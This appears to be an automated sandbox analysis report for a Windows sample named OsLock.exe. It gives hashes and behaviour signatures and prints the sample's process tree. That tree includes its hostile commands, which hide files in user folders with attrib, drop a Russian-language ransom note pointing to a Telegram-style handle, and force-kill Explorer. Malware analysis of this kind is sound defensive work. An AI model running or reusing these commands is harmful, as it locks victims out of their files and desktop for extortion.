Overview

overview

10

Static

static

3

OsLock.exe

windows7-x64

10

OsLock.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-11-2024 09:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    OsLock.exe

  • Size

    385KB

  • MD5

    675ea787630f596da0474830ffb49723

  • SHA1

    c8e18cbc3cca1ded47eb5860a71b9f22d46409e1

  • SHA256

    ad861f41bb4a31ee778bf60cecf0a7bdd9c0cc91d5cc17775d15199c214fbccf

  • SHA512

    fa3c2c6edd3435bd16ec652c1738695cd1e8cdbd010b55fd856cefdbebd50552074d06e9b66860fae9c3a2f71ffe1076bb0227944b49286f05e1a3a4c871014d

  • SSDEEP

    6144:Z1IE/9oydPc4IvjTZlyZsDDyr3rAUp48zUCpM69/KImQi/6ebkY:Z1vlc4IrTZlyGDc54

Score
10/10
defense_evasionpersistence

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Adds Run key to start application 2 TTPs 13 IoCs
    persistence
  • Drops desktop.ini file(s) 4 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 6 IoCs
    defense_evasion
  • Kills process with taskkill 1 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs
  • Views/modifies file attributes 1 TTPs 12 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\OsLock.exe
    "C:\Users\Admin\AppData\Local\Temp\OsLock.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:460
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c F: & attrib +h +s +r +i /D & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:3700
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Views/modifies file attributes
        PID:856
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-lox.txt
        3⤵
        • Views/modifies file attributes
        PID:2808
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%\desktop"&attrib +h +s +r +i /D & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:1108
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:5096
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-lox.txt
        3⤵
        • Views/modifies file attributes
        PID:5092
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%systemdrive%\Users\Public\Desktop"&attrib +h +s +r +i /D & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4320
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:1524
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-lox.txt
        3⤵
        • Views/modifies file attributes
        PID:4868
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%\downloads"&attrib +h +s +r +i /D & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:740
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:1444
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-lox.txt
        3⤵
        • Views/modifies file attributes
        PID:4540
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%\documents"&attrib +h +s +r +i /D & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:1432
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:2468
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-lox.txt
        3⤵
        • Views/modifies file attributes
        PID:4260
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%"&attrib +h +s +r +i /D & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:1880
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Views/modifies file attributes
        PID:2564
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-lox.txt
        3⤵
        • Views/modifies file attributes
        PID:444
    • C:\Windows\SYSTEM32\taskkill.exe
      taskkill.exe /im Explorer.exe /f
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1404

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\Documents\info-0v92.txt
    Filesize

    56B

    MD5

    5250167e9ed5616c92f2c49b7e295375

    SHA1

    6ca4f968809543f95a7c476bf39a9000231a4a4e

    SHA256

    0a8ce0b30dffe9ca968d05f8067a017bc48e0f5a432d75b4b7d25d59ad58a40d

    SHA512

    df65c59ba2c3b5033b85c4a526957c0ecd508acb2222b95133fa574df7a77abd3007a682d56312357e3ace87b88bd386c5463884d2c28c184808cf7c0608aeec

    Download Submit

  • memory/460-18-0x000000001B700000-0x000000001B8A9000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/460-27-0x000000001B700000-0x000000001B8A9000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/460-17-0x000000001B700000-0x000000001B8A9000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/460-12-0x00007FFF166E3000-0x00007FFF166E5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/460-13-0x000000001B700000-0x000000001B8A9000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/460-14-0x00007FFF166E0000-0x00007FFF171A1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/460-15-0x000000001B700000-0x000000001B8A9000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/460-16-0x000000001B700000-0x000000001B8A9000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/460-1-0x00000000005E0000-0x0000000000646000-memory.dmp

    Filesize

    408KB

    Download

  • memory/460-2-0x00007FFF166E0000-0x00007FFF171A1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/460-20-0x000000001B700000-0x000000001B8A9000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/460-19-0x000000001B700000-0x000000001B8A9000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/460-21-0x000000001B700000-0x000000001B8A9000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/460-22-0x000000001B700000-0x000000001B8A9000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/460-23-0x000000001B700000-0x000000001B8A9000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/460-24-0x000000001B700000-0x000000001B8A9000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/460-25-0x000000001B700000-0x000000001B8A9000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/460-26-0x000000001B700000-0x000000001B8A9000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/460-0-0x00007FFF166E3000-0x00007FFF166E5000-memory.dmp

    Filesize

    8KB

    Download